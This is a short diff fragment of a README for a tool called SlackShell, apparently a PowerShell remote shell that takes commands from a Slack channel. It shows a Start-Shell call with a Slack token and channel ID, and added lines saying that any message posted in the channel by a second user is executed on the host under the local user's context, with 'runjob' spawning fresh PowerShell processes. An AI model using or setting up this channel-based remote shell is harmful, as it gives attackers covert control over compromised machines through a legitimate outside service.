bkup/SlackShell/README.md

 Start-Shell -Token "xoxp-175828824580-175707545555-176600001223-826315a84e533c482bb7e20e8312fh45k" -Channel "ABC123456" -Sleep 5

+Join the same Slack channel as a different user than what was used to create the token.
+Anything written into the channel as the different user will get executed on the host under the same local user context that was used to start the script.
+Alternatively, "runjob" can be used to execute commands in a newly spawned PowerShell process.

 ## Reserved Shell Commands (in the Slack channel)
 #### exit
 Closes the shell and connection.